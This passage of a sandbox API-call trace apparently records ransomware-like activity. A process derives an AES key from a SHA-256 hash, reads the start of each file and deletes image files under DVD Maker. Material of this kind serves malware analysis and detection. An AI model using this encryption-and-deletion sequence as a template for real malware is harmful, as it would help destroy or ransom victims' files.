phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.602] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.602] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.602] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc2e [0142.602] ReadFile (in: hFile=0x424, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.604] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.604] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.604] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.606] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationright_selectionsubpicture.png")) returned 0 [0142.618] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.619] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.619] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.619] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.619] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x135b [0142.619] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.622] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.622] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.622] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.623] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationup_buttongraphic.png")) returned 0 [0142.623] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.624] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.624] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.624] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.624] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc09 [0142.624] ReadFile (in: hFile=0x424, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.626] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.626] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.626] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.628] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationup_selectionsubpicture.png")) returned 0 [0142.628] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.628] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.628] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.628] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.629] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf2f [0142.629] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.630] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.631] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.631] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.632] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\title_stripe.png")) returned 0 [0142.657] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0142.679] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0142.679] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.679] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.679] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.679] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11da [0142.679] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.682] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.682] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.682] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.683] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\1047x576black.png")) returned 0 [0142.755] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0142.755] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.755] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.755] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.755] GetFileSize (in: hFile=0x43c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb04 [0142.755] ReadFile (in: hFile=0x43c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.758] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.758] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.758] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.759] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\203x8subpicture.png")) returned 0 [0142.760] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0142.760] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.760] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.761] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.761] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x191f [0142.761] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.804] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.804] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.805] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.806] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\blackbars60.png")) returned 0 [0142.807] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0142.807] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.807] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.807] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.807] GetFileSize (in: hFile=0x43c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5fed [0142.807] ReadFile (in: hFile=0x43c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.815] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.815] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.815] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.816] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\layers.png")) returned 0 [0142.817] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0142.820] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.820] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.820] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.820] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13e0 [0142.820] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.822] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.822] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.822] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.824] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_buttongraphic.png")) returned 0 [0142.825] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0142.826] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.826] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.826] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.826] GetFileSize (in: hFile=0x43c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc3a [0142.826] ReadFile (in: hFile=0x43c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.838] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.838] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.838] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.839] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_selectionsubpicture.png")) returned 0 [0142.842] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0142.842] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.842] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.843] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.843] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13a1 [0142.843] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.853] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.853] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.853] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.854] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationright_buttongraphic.png")) returned 0 [0142.856] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0142.857] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.857] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.857] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.857] GetFileSize (in: hFile=0x43c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc2e [0142.857] ReadFile (in: hFile=0x43c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.862] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.862] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.862] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.863] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationright_selectionsubpicture.png")) returned 0 [0142.864] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0142.866] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.866] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.866] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.866] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x135b [0142.866] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.872] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.872] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.872] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.874] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationup_buttongraphic.png")) returned 0 [0142.892] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0142.892] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.892] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.892] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.892] GetFileSize (in: hFile=0x43c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc09 [0142.892] ReadFile (in: hFile=0x43c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.894] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.894] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.894] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.895] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationup_selectionsubpicture.png")) returned 0 [0142.897] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0142.898] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.899] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.899] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.899] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.899] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb08f [0142.899] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.903] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.903] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.903] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.904] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-background.png")) returned 0 [0142.905] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.905] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.905] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.905] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.905] GetFileSize (in: hFile=0x43c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc32 [0142.905] ReadFile (in: hFile=0x43c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.907] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.907] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.907] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.909] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-highlight.png")) returned 0 [0142.909] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.909] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.909] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.910] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.910] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x578 [0142.910] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.912] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.912] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.912] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.913] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-image-mask.png")) returned 0 [0142.913] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.914] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.914] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.914] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.914] GetFileSize (in: hFile=0x43c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8c12 [0142.914] ReadFile (in: hFile=0x43c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.918] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.918] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.918] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.920] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-overlay.png")) returned 0 [0142.921] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.921] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.921] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.921] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.921] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2f993 [0142.921] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, 